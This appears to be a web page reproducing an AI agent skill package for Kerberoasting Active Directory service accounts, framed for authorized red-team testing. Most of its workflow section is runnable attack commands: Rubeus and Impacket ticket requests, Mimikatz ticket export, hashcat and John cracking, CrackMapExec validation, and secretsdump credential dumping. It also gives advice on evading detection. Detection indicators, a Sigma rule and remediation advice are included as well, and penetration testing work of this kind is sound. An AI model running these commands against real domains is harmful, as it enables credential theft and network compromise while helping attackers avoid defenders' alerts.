What it does. Perform Kerberoasting, a post-exploitation technique that enumerates Part of mukul975/Anthropic-Cybersecurity-Skills (817 security skills) (mukul975/Anthropic-Cybersecurity-Skills).
Install
npx skills add mukul975/Anthropic-Cybersecurity-Skills --skill performing-kerberoasting-attack, or copy the skill folder into ~/.claude/skills/performing-kerberoasting-attack/.
- Raw file:
curl -sL https://raw.githubusercontent.com/mukul975/Anthropic-Cybersecurity-Skills/HEAD/skills/performing-kerberoasting-attack/SKILL.md
SKILL.md (verbatim)
name: performing-kerberoasting-attack
description: Perform Kerberoasting, a post-exploitation technique that enumerates
Active Directory service accounts with Service Principal Names (SPNs), requests
their Kerberos TGS tickets, and cracks the NTLM-encrypted tickets offline to recover
service account credentials. Use during authorized red team engagements or penetration
tests to assess AD privilege escalation and credential access risk from weak service
account passwords.
domain: cybersecurity
subdomain: red-teaming
tags:
- red-team
- adversary-simulation
- mitre-attack
- exploitation
- post-exploitation
- kerberoasting
- active-directory
- credential-access
version: '1.0'
author: mahipal
license: Apache-2.0
d3fend_techniques:
- Application Protocol Command Analysis
- Network Isolation
- Network Traffic Analysis
- Client-server Payload Profiling
- Network Traffic Community Deviation
nist_csf:
- ID.RA-01
- GV.OV-02
- DE.AE-07
mitre_attack:
- T1595
- T1190
- T1059
- T1078
- T1003
Performing Kerberoasting Attack
Legal Notice: This skill is for authorized security testing and educational purposes only. Unauthorized use against systems you do not own or have written permission to test is illegal and may violate computer fraud laws.
Overview
Kerberoasting is a post-exploitation technique that targets service accounts in Active Directory by requesting Kerberos TGS (Ticket Granting Service) tickets for accounts with Service Principal Names (SPNs) set. These tickets are encrypted with the service account's NTLM hash, allowing offline brute-force cracking without generating failed login events. It is one of the most common privilege escalation paths in AD environments because any domain user can request TGS tickets.
When to Use
- When conducting security assessments that involve performing kerberoasting attack
- When following incident response procedures for related security events
- When performing scheduled security testing or auditing activities
- When validating security controls through hands-on testing
Prerequisites
- Familiarity with red teaming concepts and tools
- Access to a test or lab environment for safe execution
- Python 3.8+ with required dependencies installed
- Appropriate authorization for any testing activities
MITRE ATT&CK Mapping
- T1558.003 - Steal or Forge Kerberos Tickets: Kerberoasting
- T1087.002 - Account Discovery: Domain Account
- T1069.002 - Permission Groups Discovery: Domain Groups
Workflow
Phase 1: SPN Enumeration
- Enumerate accounts with SPNs using LDAP queries
- Filter for user accounts (not computer accounts)
- Identify accounts with elevated privileges (adminCount=1)
- Prioritize accounts with weak password policies
Phase 2: TGS Ticket Request
- Request TGS tickets for identified SPN accounts
- Extract ticket data in crackable format (hashcat/john compatible)
- Ensure RC4 encryption is requested when possible (easier to crack)
- Document all requested tickets
Phase 3: Offline Cracking
- Use hashcat mode 13100 (Kerberos 5 TGS-REP etype 23) for RC4 tickets
- Use hashcat mode 19700 (Kerberos 5 TGS-REP etype 17) for AES-128
- Use hashcat mode 19800 (Kerberos 5 TGS-REP etype 18) for AES-256
- Apply targeted wordlists and rules based on password policy
Phase 4: Credential Validation
- Validate cracked credentials against domain
- Assess access level of compromised accounts
- Map accounts to BloodHound attack paths
- Document for engagement report
| Tool |
Purpose |
Platform |
| Rubeus |
Kerberoasting and ticket manipulation |
Windows (.NET) |
| Impacket GetUserSPNs.py |
Remote Kerberoasting |
Linux/Python |
| PowerView |
SPN enumeration |
Windows (PowerShell) |
| hashcat |
Offline password cracking |
Cross-platform |
| John the Ripper |
Offline password cracking |
Cross-platform |
Detection Indicators
- Event ID 4769: Kerberos Service Ticket Request with RC4 encryption (0x17)
- Anomalous TGS requests from a single account in short timeframe
- TGS requests for services the user normally does not access
- Honeypot SPN accounts with alerting on ticket requests
Validation Criteria
Other files in this skill
assets/template.md (verbatim)
Kerberoasting Assessment Report Template
Document Control
| Field |
Value |
| Domain |
[DOMAIN.LOCAL] |
| Engagement ID |
[ID] |
| Assessor |
[NAME] |
| Date |
[DATE] |
1. Summary
Total Kerberoastable Accounts: [X]
Credentials Cracked: [Y] / [X]
2. Vulnerable Accounts
| Account |
SPN |
Admin |
Cracked |
Password Age (days) |
|
|
Yes/No |
Yes/No |
|
3. Attack Evidence
TGS Request Command
[command used]
Cracking Command
[hashcat command]
Cracked Output
[account:password]
4. Impact Assessment
| Account |
Access Level |
Systems Affected |
Risk |
|
|
|
Critical/High/Medium |
5. Recommendations
| # |
Recommendation |
Priority |
Effort |
| 1 |
Convert to gMSA |
Critical |
Medium |
| 2 |
Set 25+ char passwords |
Critical |
Low |
| 3 |
Disable RC4 encryption |
High |
Medium |
| 4 |
Deploy SPN honeypots |
Medium |
Low |
6. MITRE ATT&CK Reference
- T1558.003 - Kerberoasting
- T1087.002 - Domain Account Discovery
references/api-reference.md (verbatim)
API Reference — Performing Kerberoasting Attack
Libraries Used
- subprocess: Execute ldapsearch, PowerShell, Impacket GetUserSPNs, wevtutil
- python-evtx: Parse Windows Security EVTX for Event ID 4769
- xml.etree.ElementTree: Parse EVTX XML event data
- impacket (external): GetUserSPNs.py for TGS ticket requests
CLI Interface
python agent.py enum --domain corp.example.com
python agent.py roast --domain corp.example.com [--user svc_account]
python agent.py analyze --file kerberoast_hashes.txt
python agent.py detect [--evtx security.evtx]
Core Functions
enumerate_spn_accounts(domain) — Find SPN-enabled accounts
LDAP query for (servicePrincipalName=*). Falls back to PowerShell Get-ADUser.
Identifies high-value targets with admin group membership.
request_tgs_tickets(domain, username) — Execute Kerberoasting
Uses Impacket GetUserSPNs with -request flag. Outputs $krb5tgs$ hashes.
analyze_kerberoast_hashes(hash_file) — Assess hash crackability
Categorizes by encryption type: RC4 (etype 23, crackable) vs AES (etype 17/18).
detect_kerberoasting(evtx_file) — Detect attack via Event ID 4769
Flags TGS requests with RC4 encryption (0x17) as suspicious Kerberoasting indicators.
Encryption Types
| Etype |
Algorithm |
Crackability |
| 0x17 (23) |
RC4-HMAC |
HIGH — fast offline cracking |
| 0x11 (17) |
AES128 |
LOW — computationally expensive |
| 0x12 (18) |
AES256 |
LOW — computationally expensive |
Dependencies
pip install impacket python-evtx
System: ldapsearch (optional), PowerShell with AD module (Windows)
references/standards.md (verbatim)
Standards and Framework References
MITRE ATT&CK - Credential Access (TA0006)
| Technique ID |
Name |
Description |
| T1558.003 |
Steal or Forge Kerberos Tickets: Kerberoasting |
Request TGS tickets for SPN accounts and crack offline |
| T1558 |
Steal or Forge Kerberos Tickets |
Parent technique for Kerberos attacks |
MITRE ATT&CK - Discovery (TA0007)
| Technique ID |
Name |
Description |
| T1087.002 |
Account Discovery: Domain Account |
Enumerate domain accounts with SPNs |
| T1069.002 |
Permission Groups Discovery: Domain Groups |
Identify group membership of SPN accounts |
Kerberos Authentication Protocol
Normal TGS Request Flow
- Client presents TGT to KDC (Domain Controller)
- KDC validates TGT and issues TGS ticket
- TGS ticket is encrypted with target service account's long-term key (NTLM hash)
- Client presents TGS to target service
- Service decrypts ticket and validates PAC
Kerberoasting Exploitation
- Any domain user can request TGS for any SPN
- TGS is encrypted with the service account password hash
- RC4 encryption (etype 23) uses NTLM hash directly
- AES encryption (etype 17/18) is slower to crack but still possible
- Cracking happens offline - no failed logon events generated
Encryption Types
| Etype |
Algorithm |
Hashcat Mode |
Crack Difficulty |
| 23 |
RC4-HMAC (NTLM) |
13100 |
Easiest |
| 17 |
AES128-CTS-HMAC-SHA1 |
19700 |
Hard |
| 18 |
AES256-CTS-HMAC-SHA1 |
19800 |
Hardest |
NIST SP 800-63B - Authentication Guidelines
- Recommends minimum 8-character passwords
- Service accounts should use 25+ character passwords
- Managed Service Accounts (MSA/gMSA) automatically rotate passwords
CIS Benchmark - Kerberos Configuration
- Ensure 'Network security: Configure encryption types allowed for Kerberos' excludes RC4
- Monitor Event ID 4769 for anomalous service ticket requests
- Implement AES-only encryption for service accounts
- Use Group Managed Service Accounts where possible
Detection References
| Event ID |
Description |
Relevance |
| 4769 |
Kerberos Service Ticket Operation |
TGS request with etype |
| 4770 |
Kerberos Service Ticket Renewed |
Ticket renewal |
| 4768 |
Kerberos Authentication Ticket (TGT) |
Initial authentication |
Sigma Rule Reference
title: Kerberoasting Activity
logsource:
product: windows
service: security
detection:
selection:
EventID: 4769
TicketEncryptionType: '0x17'
ServiceName: '*$'
filter:
ServiceName: 'krbtgt'
condition: selection and not filter
references/workflows.md (verbatim)
Kerberoasting Attack Workflows
Workflow 1: Kerberoasting with Rubeus (Windows)
Step 1: Enumerate Kerberoastable Accounts
# List all Kerberoastable users
.\Rubeus.exe kerberoast /stats
# Full Kerberoasting - request all SPN tickets
.\Rubeus.exe kerberoast /outfile:kerberoast_hashes.txt
# Target specific user
.\Rubeus.exe kerberoast /user:svc_sql /outfile:svc_sql_hash.txt
# Request RC4 encrypted tickets specifically
.\Rubeus.exe kerberoast /rc4opsec /outfile:rc4_hashes.txt
# Request AES tickets
.\Rubeus.exe kerberoast /aes /outfile:aes_hashes.txt
# Kerberoast from a different domain
.\Rubeus.exe kerberoast /domain:child.targetdomain.local /outfile:child_hashes.txt
Step 2: Targeted Kerberoasting (set SPN on account with GenericWrite)
# If you have GenericWrite/GenericAll on an account, set an SPN
Set-DomainObject -Identity targetuser -Set @{serviceprincipalname='nonexistent/SERVICE'}
# Request TGS for the newly set SPN
.\Rubeus.exe kerberoast /user:targetuser /outfile:targeted_hash.txt
# Clean up - remove the SPN
Set-DomainObject -Identity targetuser -Clear serviceprincipalname
Workflow 2: Kerberoasting with Impacket (Linux)
Step 1: Remote Kerberoasting
# Basic Kerberoasting with password
impacket-GetUserSPNs targetdomain.local/user:Password123 -dc-ip 10.0.0.1 -request -outputfile kerberoast.txt
# With NTLM hash (pass-the-hash)
impacket-GetUserSPNs targetdomain.local/user -hashes :aad3b435b51404eeaad3b435b51404ee:NTHASH -dc-ip 10.0.0.1 -request
# Target specific user
impacket-GetUserSPNs targetdomain.local/user:Password123 -dc-ip 10.0.0.1 -request -outputfile kerberoast.txt -target-domain targetdomain.local
# Enumerate without requesting tickets
impacket-GetUserSPNs targetdomain.local/user:Password123 -dc-ip 10.0.0.1
Workflow 3: Kerberoasting with PowerView (PowerShell)
# Import PowerView
Import-Module .\PowerView.ps1
# Find all users with SPNs
Get-DomainUser -SPN | Select-Object samaccountname, serviceprincipalname, admincount
# Get detailed SPN information
Get-DomainUser -SPN -Properties samaccountname,serviceprincipalname,pwdlastset,lastlogon,admincount
# Request TGS tickets using built-in cmdlet
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/sqlserver.targetdomain.local:1433"
# Export ticket from memory using Mimikatz
Invoke-Mimikatz -Command '"kerberos::list /export"'
Workflow 4: Offline Password Cracking
Hashcat
# RC4 encrypted tickets (etype 23) - Hashcat mode 13100
hashcat -m 13100 kerberoast.txt /usr/share/wordlists/rockyou.txt --rules-file /usr/share/hashcat/rules/best64.rule
# AES-128 tickets (etype 17) - Hashcat mode 19700
hashcat -m 19700 aes_hashes.txt /usr/share/wordlists/rockyou.txt
# AES-256 tickets (etype 18) - Hashcat mode 19800
hashcat -m 19800 aes_hashes.txt /usr/share/wordlists/rockyou.txt
# Using custom rules for corporate passwords
hashcat -m 13100 kerberoast.txt wordlist.txt -r corporate.rule
# Brute force with mask (e.g., Summer2024!)
hashcat -m 13100 kerberoast.txt -a 3 '?u?l?l?l?l?l?d?d?d?d?s'
# Combined dictionary + rules
hashcat -m 13100 kerberoast.txt wordlist.txt -r /usr/share/hashcat/rules/d3ad0ne.rule -r /usr/share/hashcat/rules/toggles1.rule
John the Ripper
# Crack Kerberoast hashes
john --format=krb5tgs kerberoast.txt --wordlist=/usr/share/wordlists/rockyou.txt
# With rules
john --format=krb5tgs kerberoast.txt --wordlist=wordlist.txt --rules=KoreLogicRulesAppend4Num
Workflow 5: Post-Exploitation
Credential Validation
# Validate cracked credentials with CrackMapExec
crackmapexec smb 10.0.0.0/24 -u svc_sql -p 'CrackedPassword123!'
# Check if account has admin rights anywhere
crackmapexec smb 10.0.0.0/24 -u svc_sql -p 'CrackedPassword123!' --shares
# Check DCSync rights
crackmapexec smb 10.0.0.1 -u svc_sql -p 'CrackedPassword123!' -M dcsync
# Use credentials for further enumeration
impacket-secretsdump targetdomain.local/svc_sql:'CrackedPassword123!'@10.0.0.1
OPSEC Considerations
- Request tickets for only a few accounts at a time to avoid detection
- Prefer AES tickets over RC4 - RC4 requests may trigger alerts
- Use /rc4opsec flag in Rubeus to avoid requesting RC4 for AES-enabled accounts
- Spread requests over time rather than requesting all at once
- Target accounts with older password change dates (more likely weak)
- Monitor for honeypot SPNs that may alert the SOC
Back to mukul975/Anthropic-Cybersecurity-Skills (817 security skills) or Agent skills.